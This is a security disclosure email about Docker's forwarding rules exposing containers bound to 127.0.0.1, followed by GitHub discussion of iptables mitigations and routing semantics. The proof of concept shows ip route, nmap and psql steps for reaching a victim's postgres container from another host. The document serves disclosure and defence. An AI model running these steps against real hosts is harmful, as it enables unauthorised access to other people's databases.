From self[at]sungpae.com Mon Nov 8 16:59:48 2021
Date: Mon, 8 Nov 2021 16:59:48 -0600
From: Sung Pae <self[at]sungpae.com>
To: [email protected]
Subject: Permissive forwarding rule leads to unintentional exposure of
 containers to external hosts
Message-ID: <YYmr4l1isfH9VQCn@SHANGRILA>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha256;
 protocol="application/pgp-signature"; boundary="QR1yLfEBO/zgxYVA"
Content-Disposition: inline
X-PGP-Key: fp="4BC7 2AA6 B1AE 2B5A C7F7 ADCF 9D1A A266 D2BC 9C2D"
X-TUID: Avm8Mn+0Qq5s

--QR1yLfEBO/zgxYVA
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Hello,

The documentation for "docker run --publish" states:

> Note that ports which are not bound to the host (i.e., -p 80:80 instead of
> -p 127.0.0.1:80:80) will be accessible from the outside. This also applies
> if you configured UFW to block this specific port, as Docker manages his own
> iptables rules.

https://docs.docker.com/engine/reference/commandline/run/#publish-or-expose-port--p---expose

The statement above is accurate, but terribly misleading, since traffic
to the container's published ports from external hosts will still be
forwarded due to an explicit forwarding rule added to the DOCKER chain:

    # iptables -nvL DOCKER
    Chain DOCKER (2 references)
     pkts bytes target  prot opt in        out      source     destination
        0     0 ACCEPT  tcp  --  !docker0  docker0  0.0.0.0/0  172.17.0.2   tcp dpt:80

An attacker that sends traffic to 172.17.0.2:80 *through* the docker
host will match the rule above and successfully connect to the
container, obviating any security benefit of binding the published port
on the host to 127.0.0.1.

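To make the match concrete, here is a minimal Python sketch that models only the fields visible in the rule listing above (in-interface, out-interface, destination, protocol, destination port). It illustrates the matching logic and is not how netfilter is implemented. The `Packet` type, the `matches_docker_rule` helper, the interface name `eth0`, and the attacker address 192.168.0.50 are assumptions invented for this example.

```python
from dataclasses import dataclass
from ipaddress import ip_address


@dataclass(frozen=True)
class Packet:
    in_iface: str   # interface the packet arrived on
    out_iface: str  # interface chosen by the routing decision
    src: str
    dst: str
    proto: str
    dport: int


def matches_docker_rule(pkt: Packet) -> bool:
    """Model of: ACCEPT tcp -- !docker0 docker0 0.0.0.0/0 172.17.0.2 tcp dpt:80"""
    return (
        pkt.in_iface != "docker0"      # "!docker0": any other ingress interface
        and pkt.out_iface == "docker0"
        and ip_address(pkt.dst) == ip_address("172.17.0.2")
        and pkt.proto == "tcp"
        and pkt.dport == 80
        # The source column is 0.0.0.0/0, so the source address is never checked.
    )


# Hypothetical attacker on the LAN who routes 172.17.0.2 via the docker host.
external = Packet("eth0", "docker0", "192.168.0.50", "172.17.0.2", "tcp", 80)
print(matches_docker_rule(external))
```

Nothing in the modeled rule refers to the 127.0.0.1 bind address, which is why the bind address has no effect on forwarded traffic.
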
What's worse, users who bind their published ports to 127.0.0.1 operate
under a false sense of security and may not bother taking further
precautions against unintentional exposure.

## Proof of Concept

Here is a simple proof of concept:

1. [VICTIM] Start a postgres container and publish its main port to
   127.0.0.1 on the host.

       [email protected]# docker run -e POSTGRES_PASSWORD=password -p 127.0.0.1:5432:5432 postgres

2. [ATTACKER] Route all packets destined for 172.16.0.0/12 through the
   victim's machine.

       [email protected]# ip route add 172.16.0.0/12 via 192.168.0.100

3. [ATTACKER] Discover open ports on the victim's internal docker networks.

       [email protected]# nmap -p5432 -Pn --open 172.16.0.0/12
       Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-05 15:00 CDT
       Nmap scan report for 172.17.0.2
       Host is up (0.00047s latency).

       PORT     STATE SERVICE
       5432/tcp open  postgresql

4. [ATTACKER] Connect to the victim's container.

       [email protected]# psql -h 172.17.0.2 -U postgres
       Password for user postgres:

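The route added in step 2 is enough because the container address reported in step 3 lies inside the routed range. A quick check with Python's standard `ipaddress` module, using only the addresses from the steps above (the variable names are illustrative):

```python
from ipaddress import ip_address, ip_network

routed = ip_network("172.16.0.0/12")  # range routed via the victim in step 2
container = ip_address("172.17.0.2")  # address nmap reported in step 3

print(container in routed)    # True
print(routed.num_addresses)   # 1048576
```
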
## Scope of Exposure

Port publishing in docker and docker-compose is a popular way to expose
applications and databases to developers in a cross-platform development
environment.

Web searches for the pitfalls of "--publish", as well as discussions
with other developers, suggest that Docker users who are aware of the
security implications of port publishing also believe that specifying an
IP address to bind on the host will effectively constrain access to the
service they are attempting to share. This is a reasonable conclusion
that can be drawn from the documentation, but the reality is that simply
publishing a port exposes a container to external machines regardless of
the IP address bound on the host.

GitHub contains tens of thousands of projects that publish container
ports to "127.0.0.1:xxx:xxx":

* https://github.com/search?q=docker+run+%22-p+127.0.0.1%3A%22&type=code
* https://github.com/search?q=docker+run+%22--publish+127.0.0.1%3A%22&type=code
* https://github.com/search?p=5&q=%22127.0.0.1%3A5432%3A5432%22&type=Code
* https://github.com/search?q=%22127.0.0.1%3A15432%3A5432%22&type=code
* https://github.com/search?q=%22127.0.0.1%3A3306%3A3306%22&type=Code
* https://github.com/search?p=5&q=%22127.0.0.1%3A8080%3A80%22&type=Code
* And many more!

Here is a sampling of commit messages that specifically mention the
security rationale behind publishing to "127.0.0.1":

https://github.com/rubyforgood/abalone/commit/764a619babc7ac05fe9fe6edc63e9128a2c86af3

> Forward the "db" service's port to the host's loopback interface, so
> that a developer could choose to use docker-compose only for a container
> to run the database while running all the Ruby processes on their host
> computer. "127.0.0.1:5432:5432" was chosen over "5432:5432" so that the
> PostgreSQL would not be available to all other computers on the host
> computer's network (say, a coffee shop wifi).

https://github.com/MayankTahil/pref/commit/f3056408867a227e9ff6b338c51ef37d605f5dad

> [SECURITY] Limit port export to localhost
>
> It's prevents leak private developed projects vie Eth & Wi-Fi interfaces.
> You now must use `localhost` host or use host mapped directly to 127.0.0.1

https://github.com/open-edge-insights/eii-core/commit/7a85ab8ed818af73a83489554eb5737394a4cf0c

> Docker Security: Port mapping and default security options
>
> Changes:
>
> 1) Provide secuiry options in docker-compose file related to selinux and resticted privilages
> 2) Set HOST_IP as Environment Variable in Compose startup
> 2) Bind all ports to either 127.0.0.1 or Host IP

## Mitigation

While the unintentional exposure of published container ports can be
mitigated by constraining access to containers in the DOCKER-USER chain,
my observation is that most Linux users do not know how to configure
their firewalls and have not added any rules to DOCKER-USER. The few
users that do know how to configure their firewalls are likely to be
unpleasantly surprised that their existing FORWARD rules have been
preceded by Docker's own forwarding setup.

In light of this, an effective mitigation should:

1. Restrict the source addresses and/or interfaces that are allowed to
   communicate with the published container port.

   For example, "docker run -p 127.0.0.1:5432:5432" creates the
   following rule in the DOCKER chain:

       Chain DOCKER (2 references)
        pkts bytes target  prot opt in        out      source     destination
           0     0 ACCEPT  tcp  --  !docker0  docker0  0.0.0.0/0  172.17.0.2   tcp dpt:5432

   It should, however, restrict the source IP address range to
   127.0.0.1/8 and the in-interface to the loopback interface:

       Chain DOCKER (2 references)
        pkts bytes target  prot opt in  out      source       destination
           0     0 ACCEPT  tcp  --  lo  docker0  127.0.0.1/8  172.17.0.2   tcp dpt:5432

   The values of "127.0.0.1/8" and "lo" can be retrieved from the
   interface on which 127.0.0.1 is defined. For instance, if a machine
   has an IP address of 192.168.0.100 on a /24 network on eth0 and the
   user runs "docker run -p 192.168.0.100:5432:5432", we would expect to
   see the following:

       Chain DOCKER (2 references)
        pkts bytes target  prot opt in    out      source          destination
           0     0 ACCEPT  tcp  --  eth0  docker0  192.168.0.0/24  172.17.0.2   tcp dpt:5432

2. Default to "127.0.0.1" when a bind address is not supplied to "--publish".

   This is a breaking change, but it should have been the default from
   the beginning.

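As a rough sketch of point 1, the source network can be derived from the bind address and the prefix length of the interface that carries it. The Python below is an illustration only: `restricted_rule` is a hypothetical helper, the rule string it prints is the proposed (not current) Docker behavior, and the interface name and prefix length are assumed to be already known.

```python
from ipaddress import ip_interface


def restricted_rule(iface: str, bind_cidr: str, container_ip: str, port: int) -> str:
    """Build a hypothetical rule spec limited to the bind address's own network."""
    # ip_interface("192.168.0.100/24").network is 192.168.0.0/24
    network = ip_interface(bind_cidr).network
    return (
        f"-A DOCKER -i {iface} -o docker0 -s {network} "
        f"-d {container_ip}/32 -p tcp -m tcp --dport {port} -j ACCEPT"
    )


print(restricted_rule("lo", "127.0.0.1/8", "172.17.0.2", 5432))
print(restricted_rule("eth0", "192.168.0.100/24", "172.17.0.2", 5432))
```

Note that `ipaddress` normalizes the loopback range to its network address, so the first rule carries `-s 127.0.0.0/8`.
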
## Conclusion

Docker port publishing is an *extremely* popular feature, and at
present, virtually all users that use containers with published ports
are exposed to attackers that have noticed the oversight outlined in
this email.

I have not noticed any discussion online of attackers using custom
routes to gain access to containers, but it is an obvious attack, and
perhaps unfortunately, I posted a comment about this vulnerability in a
related GitHub issue:

https://github.com/moby/moby/issues/22054#issuecomment-962202433

Thank you for your attention to this.

Sung Pae
https://github.com/guns

--QR1yLfEBO/zgxYVA
Content-Type: application/pgp-signature; name="signature.asc"

-----BEGIN PGP SIGNATURE-----

iQIzBAABCAAdFiEES8cqprGuK1rH963PnRqiZtK8nC0FAmGJq+IACgkQnRqiZtK8
nC3TvBAAka0sVXX4X2k8BIzVUoojrM1OkOBzAZl76cdI1Zmv4P6sp/zmkR7iE5eV
lUQ57cLwnalbbn9e0QyVA2/jcuB96cx8bKL8jy+JnJ0IuQ4VUYEWGTkLORIojDRJ
I8imGY83Bz4fyffoMUxG3DBeuJJCOHIHFbcoijI4xYPz2ujY3KR0vC0UYxcZLv92
bD1thh/bFXaPOPBHlVCUB9hFq1/JZ27XaH9GZ7X7TeuOp25JriU1h3U/A6gsGTkK
OBOjRVJV30tDnsVZa8TBvL27JfLGyRvGACpnOhaozSvVgePERDBeMsH6bjDNzWEs
mb9QIsxA6brZdJdH1uXJDM36nhG1eT3OM7jrZzI76+7FT2yzrQcKsk2Oes0t9ZCq
wyZbVoZGExam2bPiWvu9XJVb9TPwKpxXpLPyiuFZrlrOaBfDV1ZqFMSBXZJxFOuu
PEysiYTUpq+FufGJxH5JqWERLh79TV/f+654DG/UtOas+A7Rjy6hF9OsDXDWzpz/
lo7w3OKaXqvNZ2ysL8ihHp963fFLPkhMn2JAOBsoFa3s/hCCBwFJjxHnzF9gNRhZ
cr9f3wlk6IVJMSARPJsZCD+g5uaU1gzDbndem3SlMLjkJ4D6rLoZ3zhmkddjKhsv
CLBL6R7nEmuBcb4e97EVmCnYR8221uXmqvc2bQwPpeTLeGMG5BQ=
=+qVS
-----END PGP SIGNATURE-----

--QR1yLfEBO/zgxYVA--
Thank you for the information but I am not sure how critical this is.
This seems critical if the host that runs the docker container (192.168.0.100 in your example) forwards traffic from external machines. It is also critical if one keeps the default docker network (which I wouldn't suggest) without further management of the DOCKER-USER firewall chain (where one can state "if packets come from disallowed sources, block them").
What is not self-evident to me (and what makes the whole thing seem less critical) is:
- why should I route traffic from external machines while at the same time running docker containers;
- why should I use the default docker network for my workload;
- why shouldn't I set proper iptables rules in DOCKER-USER.
Also, even if I allow external machines to go through my firewall because why not, the whole thing is solved by an iptables rule that states "if a packet coming from the external interface wants to reach the following network, drop it" (this can be added in nat prerouting). One may say "but in this way you kill outbound connections!" Nope. If a packet from outside the host wants to reach an internal network (that is not exposed externally) on the host, then it can be dropped before any DNAT or other translation rules apply. That said, @peterwwillis has a nicer solution for it.
> The established norm when binding to an external interface is that the entire outside world can reach it

This is only true for a host on the Internet with a single "external" interface. A machine can join multiple networks, and an application can choose to listen for connections on a subset of those networks that are not reachable from the Internet.
For example, a typical home router has an IP address on the Internet (e.g. `93.184.216.34`), and it also has an IP address on the local network it creates (e.g. `192.168.0.1/24`). A user that starts an application on this router and binds it to `192.168.0.1:1234` can reasonably expect that only other machines on the `192.168.0.0/24` network will be able to connect to the service.
The conventional way to ask an application to accept connections from all hosts is to specify the special bind address `0.0.0.0`. You can search for `INADDR_ANY` to read up on this topic.
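For readers unfamiliar with the distinction, here is a minimal sketch using Python's standard `socket` module. It only shows which local address a listening socket is bound to; `bound_address` is a helper name made up for this example, and port 0 is used so the OS picks any free port.

```python
import socket


def bound_address(host: str) -> str:
    """Bind a TCP socket to `host` on an OS-chosen port and return the bound IP."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.bind((host, 0))  # port 0 lets the OS pick a free port
        return sock.getsockname()[0]


print(bound_address("127.0.0.1"))  # loopback only
print(bound_address("0.0.0.0"))    # INADDR_ANY: every local IPv4 address
```
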
> - why should I route traffic from external machines while at the same time running docker

The trouble here is that even if you start with an empty FORWARD chain with the policy set to DROP (i.e. block all forwarding attempts in either direction), dockerd inserts its own rules into the FORWARD chain that explicitly allow external machines to access your containers. This behavior is dangerous because it defeats a previously secure firewall setup.

> - why should I use the default docker network for my workload;

This issue is unrelated to the internal docker network. In fact, I stumbled on this exposure while working on a container on a custom network.

> - why shouldn't I set proper iptables rules in DOCKER-USER
You should. I have the following iptables rules on my work machine:
-A DOCKER-USER -o br-+ -m conntrack --ctstate RELATED,ESTABLISHED -m comment --comment DOCKER-inbound -j RETURN
-A DOCKER-USER -o docker0 -m conntrack --ctstate RELATED,ESTABLISHED -m comment --comment DOCKER-inbound -j RETURN
-A DOCKER-USER -i br-+ -m comment --comment DOCKER-outbound -j RETURN
-A DOCKER-USER -i docker0 -m comment --comment DOCKER-outbound -j RETURN
-A DOCKER-USER -j REJECT
https://github.com/guns/haus/blob/master/share/iptables/iptables.script#L151-L158
The problem is that approximately dozens of users worldwide know that this is necessary when using `--publish 127.0.0.1:port:port`. A default behavior that violates assumptions about binding to 127.0.0.1 and undermines secure firewalls is an issue that requires fixing even if it can be mitigated by the user.
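To show how the five DOCKER-USER rules above are evaluated, here is a small Python model of first-match rule evaluation. It is a simplified sketch, not iptables itself: it considers only the interface and conntrack-state matches used in those rules, and the names `RULES`, `iface_matches`, and `docker_user_verdict`, as well as the `eth0` interface, are assumptions made for the example.

```python
from typing import Optional

# (in-interface, out-interface, required conntrack states, target)
# None means "any". A trailing "+" is the iptables interface-name wildcard.
RULES = [
    (None, "br-+", {"RELATED", "ESTABLISHED"}, "RETURN"),
    (None, "docker0", {"RELATED", "ESTABLISHED"}, "RETURN"),
    ("br-+", None, None, "RETURN"),
    ("docker0", None, None, "RETURN"),
    (None, None, None, "REJECT"),
]


def iface_matches(pattern: Optional[str], iface: str) -> bool:
    if pattern is None:
        return True
    if pattern.endswith("+"):
        return iface.startswith(pattern[:-1])
    return iface == pattern


def docker_user_verdict(in_iface: str, out_iface: str, ctstate: str) -> str:
    """Return the target of the first rule that matches the packet."""
    for in_pat, out_pat, states, target in RULES:
        if (
            iface_matches(in_pat, in_iface)
            and iface_matches(out_pat, out_iface)
            and (states is None or ctstate in states)
        ):
            return target
    return "RETURN"  # not reached here: the final rule matches everything


print(docker_user_verdict("eth0", "docker0", "NEW"))          # REJECT
print(docker_user_verdict("eth0", "docker0", "ESTABLISHED"))  # RETURN
print(docker_user_verdict("docker0", "eth0", "NEW"))          # RETURN
```

In this model, replies to connections that containers opened and all traffic leaving a bridge return to the FORWARD chain, while new connections arriving from any non-bridge interface are rejected.
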
> > The established norm when binding to an external interface is that the entire outside world can reach it
>
> This is only true for a host on the Internet with a single "external" interface. A machine can join multiple networks, and an application can choose to listen for connections on a subset of those networks that are not reachable from the Internet.
> For example, a typical home router has an IP address on the Internet (e.g. `93.184.216.34`), and it also has an IP address on the local network it creates (e.g. `192.168.0.1/24`). A user that starts an application on this router and binds it to `192.168.0.1:1234` can reasonably expect that only other machines on the `192.168.0.0/24` network will be able to connect to the service.

I think you are confusing unroutable addresses with what happens when specific addresses/interfaces are bound. Having multiple interfaces or addresses etc has nothing to do with it.
I suggest you read up about how IP (internet protocol) routing works in its simplest form. It might be good to start with RFC1918 because it covers in detail the address spaces of which your example `192.168.0.0/24` is a subset. There is no presumption that only link-local clients are allowed to connect.
In your example, the reason the home network reasonably expects the public internet not to be able to reach a listening server is that RFC1918 addresses are not routable from the public non-1918 internet.
If you had other networks - for example a 192.168.1.0/24 network - on the inside of your external router, and working routes (either explicit or default) between those networks, and you had a listener at 192.168.0.1, you would need a firewall to intercept traffic to prevent it being accessible from 192.168.1.0/24.
I hope this ramble helped ;)
> It might be good to start with RFC1918 because it covers in detail the address spaces of which your example 192.168.0.0/24 is a subset. There is no presumption that only link-local clients are allowed to connect.

I chose to illustrate with a router because of your comment about the "entire outside world", but it appears this has confused the discussion. My point is that a machine can belong to two different networks whose traffic can be isolated from each other, and therefore binding to one IP address on one network versus binding to all IP addresses on all networks has some utility. It just happens that in my example packets bound for private addresses are not allowed on public networks.

> If you had other networks - for example a 192.168.1.0/24 network - on the inside of your external router, and working routes (either explicit or default) between those networks, and you had a listener at 192.168.0.1, you would need a firewall to intercept traffic to prevent it being accessible from 192.168.1.0/24.

Yes, you're correct. In this example you'd need a firewall rule to restrict access to hosts in `192.168.0.0/24`.
So maybe you can clarify your statement:

> The established norm when binding to an external interface is that the entire outside world can reach it

If my machine joins two networks and I properly isolate traffic from each, my expectation when binding to one IP address is that only traffic from that associated network will reach the listening socket. Is this untrue?
This discussion relates to `--publish` in that restricting `--publish 192.168.0.1:1234:1234` to the interface and network to which that IP address belongs mirrors the equivalent setup required to bind and isolate a listening socket on `192.168.0.1:1234`.
You asked if this is going too far, and I believe it is not, because a user that wants to accept traffic from all hosts can use `--publish 0.0.0.0:1234:1234`.
> The trouble here is that even if you start with an empty FORWARD chain with the policy set to DROP (i.e. block all forwarding attempts in either direction), dockerd inserts its own rules into the FORWARD chain that explicitly allow external machines to access your containers. This behavior is dangerous because it defeats a previously secure firewall setup.

OK, then I'll need to test this. I can see how it can happen, but if I am not mistaken the rules docker adds don't come early enough. I'll have to check.

> The problem is that approximately dozens of users worldwide know that this is necessary when using --publish 127.0.0.1:port:port. A default behavior that violates assumptions about binding to 127.0.0.1 and undermines secure firewalls is an issue that requires fixing even if can be mitigated by the user.

I agree. I consider myself to be an advanced user and even I didn't think docker would expose services that I'd assume were bound to the lo interface, but are actually accessible remotely by default. And it's insidious because if you just portscan your machine you wouldn't see it either.
I might try to open a PR for their documentation page on iptables to clarify the behavior and suggest a stopgap fix.
> -A DOCKER-USER -o br-+ -m conntrack --ctstate RELATED,ESTABLISHED -m comment --comment DOCKER-inbound -j RETURN
> -A DOCKER-USER -o docker0 -m conntrack --ctstate RELATED,ESTABLISHED -m comment --comment DOCKER-inbound -j RETURN
> -A DOCKER-USER -i br-+ -m comment --comment DOCKER-outbound -j RETURN
> -A DOCKER-USER -i docker0 -m comment --comment DOCKER-outbound -j RETURN
> -A DOCKER-USER -j REJECT

Is that enough? Could an attacker on the local network mess with conntrack (sending forged SYN, SYN+ACK, ACK)? Is it not necessary to add something like:
iptables -t raw -A PREROUTING -m rpfilter --invert -j DROP
This is awesome, but doesn't the proposed handling of `docker run -p 192.168.0.100:5432:5432` in line 170 go too far?
The established norm when binding to loopback is that the entire outside world cannot reach it [1]
The established norm when binding to an external interface is that the entire outside world can reach it [1]
Do I need a lesson in container networking, or does your proposal say that we'd expect only local-net addresses to be able to reach a deliberately-exposed port?
Footnotes
[1] subject to firewalls etc ofc